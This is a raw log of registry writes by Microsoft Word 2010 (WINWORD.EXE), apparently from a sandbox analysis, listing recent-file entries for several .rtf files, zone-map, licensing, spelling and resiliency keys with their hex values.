HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
,:>
2C3A3E005405000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 5
[F00000000][T01D4665A690A1C80][O00000000]*C:\Users\admin\Desktop\materiallas.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
#<>
233C3E005405000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 7
[F00000000][T01D6C0E7B5C8F080][O00000000]*C:\Users\admin\Desktop\letloan.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D80986B8350620][O00000000]*C:\Users\admin\Desktop\dogclear.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 3
[F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 4
[F00000000][T01D26E80939F3400][O00000000]*C:\Users\admin\Desktop\interestedvalues.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\141404
141404
04000000540500002300000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0064006F00670063006C006500610072002E007200740066000C00000064006F00670063006C006500610072002E00720074006600000000000100000000000000006B85C75A4CD401041414000414140000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 9
[F00000000][T01D2ADC3FBBD1380][O00000000]*C:\Users\admin\Documents\eggrowth.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 10
[F00000000][T01D578D91B6FEF00][O00000000]*C:\Users\admin\Documents\eventsemail.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 14
[F00000000][T01D478AD45DFA680][O00000000]*C:\Users\admin\Documents\girlsinvestment.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 3
[F00000000][T01D2DF0866754200][O00000000]*C:\Users\admin\Desktop\formsaid.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 6
[F00000000][T01D3F5CA3470E100][O00000000]*C:\Users\admin\Desktop\charlescase.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 8
[F00000000][T01D6E9A5E90E8E00][O00000000]*C:\Users\admin\Desktop\responseupdates.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 13
[F00000000][T01D5BC7062EAC980][O00000000]*C:\Users\admin\Documents\nowratings.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 15
[F00000000][T01D346A658A6E800][O00000000]*C:\Users\admin\Documents\customgoods.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D80986B8329520][O00000000]*C:\Users\admin\Desktop\
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 11
[F00000000][T01D43515FE6BF200][O00000000]*C:\Users\admin\Documents\poolfederal.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 12
[F00000000][T01D3C485C9CAA800][O00000000]*C:\Users\admin\Documents\selectmonitor.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2<>
323C3E005405000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 2
[F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3<>
333C3E005405000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 2
[F00000000][T01D80986B4AFD700][O00000000]*C:\Users\admin\Desktop\familiesfees.rtf
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
}<>
7D3C3E005405000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
n<>
6E3C3E005405000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10022400000000000F01FEC\Usage
SpellingAndGrammarFilesExp2_1058
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10030400000000000F01FEC\Usage
SpellingAndGrammarFilesExp2_1027
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10010400000000000F01FEC\Usage
SpellingAndGrammarFilesExp1_1025
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage
SpellingAndGrammarFilesExp1_1049
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100F1400000000000F01FEC\Usage
SpellingAndGrammarFilesExp1_1055
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage
SpellingAndGrammarFiles_1031
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10031400000000000F01FEC\Usage
SpellingAndGrammarFilesExp1_1043
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10065400000000000F01FEC\Usage
SpellingAndGrammarFilesExp2_1110
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10001400000000000F01FEC\Usage
SpellingAndGrammarFilesExp1_1040
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10061400000000000F01FEC\Usage
SpellingAndGrammarFilesExp1_1046
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100D2400000000000F01FEC\Usage
SpellingAndGrammarFilesExp2_1069
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage
SpellingAndGrammarFilesExp6_1042
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Toolbars\Settings
Microsoft Word
0101000000000000000006000000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
C00010033001000034010000040000001E0000001E0000001E0000001E0000001E0000001E000000220000001E0000001E0000001E000000060000000600000006000000060000000600000000000000060000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000C00000002000000020000000200000002000000000000000000000000000000480000000600000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000000DC000000E25026A1100A0063309006000D000A002D001600000016000000C0030000F501000004060300000000000000000000000000040087010C000600C80009000180FFFF000006000000040000000C0100000502000000000000A004020000001200000000603090000064000000000000FF0000FF000000000000FF01000000010000005C08E0100000000000010000E40400001D0001000000000000000200500000000000000000000000000000000000000000000000000000000000000000000